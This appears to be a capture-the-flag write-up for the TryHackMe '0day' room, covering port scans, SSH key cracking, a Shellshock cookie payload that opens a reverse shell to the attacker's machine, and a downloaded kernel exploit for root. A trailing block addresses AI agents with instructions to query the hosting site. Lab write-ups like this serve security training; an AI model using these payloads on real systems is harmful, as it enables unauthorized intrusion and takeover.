# 0day

**Room Link:** <https://tryhackme.com/room/0day>

### Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="/files/He8iQFlKxvgqJ4GqxHKK" alt=""><figcaption></figcaption></figure>

### Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="/files/8tcjA6ueQAk5k6UuxyT7" alt=""><figcaption></figcaption></figure>

### TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/raoQ8AUegbXzZsOdi2h3" alt=""><figcaption></figcaption></figure>

This appeared to be a rabbit hole but I found a key and was able to bruteforce the password for it.

<figure><img src="/files/aWMdiWC3lKc3LSxzajyZ" alt=""><figcaption></figcaption></figure>

**Kali**

```
chmod 600 id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 
```

<figure><img src="/files/PDwgtlDAjywNyhSXmFuW" alt=""><figcaption></figcaption></figure>

I found a cgi file. i tried checking if it was vulnerable to shellshock which wasn't working but it was vulnerable.&#x20;

**Kali**

```
gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi
```

<figure><img src="/files/QtfEfkXPig9USCQTz8U7" alt=""><figcaption></figcaption></figure>

## Initial Shell

**Link:** <https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi>

**Kali#1**

```
nc -lvnp 4242
```

**Kali #2**

```
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi 
```

<figure><img src="/files/DU2Vsue0LawNiU0USwiU" alt=""><figcaption></figcaption></figure>

Get autocomplete

```
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

## Privilege Escalation

**Victim**

```
uname -a 
```

<figure><img src="/files/vuSoDewQwmyKVB6WUhRm" alt=""><figcaption></figcaption></figure>

**Kali**

```
searchsploit 3.13.0
searchsploit -m linux/local/37292.c
gcc 37292.c -o exploit
python2 -m SimpleHTTPServer 81
```

<figure><img src="/files/ULo39yzCrLRssDC38nc6" alt=""><figcaption></figcaption></figure>

The exploit didn't work as it's complaining that it can't create dynamic library

**Victim**

```
cd /tmp/
wget http://10.10.91.55:81/exploit
chmod +x exploit
./exploit
```

<figure><img src="/files/m99KlmmfbcnsgQYUZo8y" alt=""><figcaption></figcaption></figure>

To fix this we just had to export the binpath from the machine

**Victim**

```
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
./exploit
```

<figure><img src="/files/EG1ZZCNSjhcQ7tZm1ZdO" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/0day.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.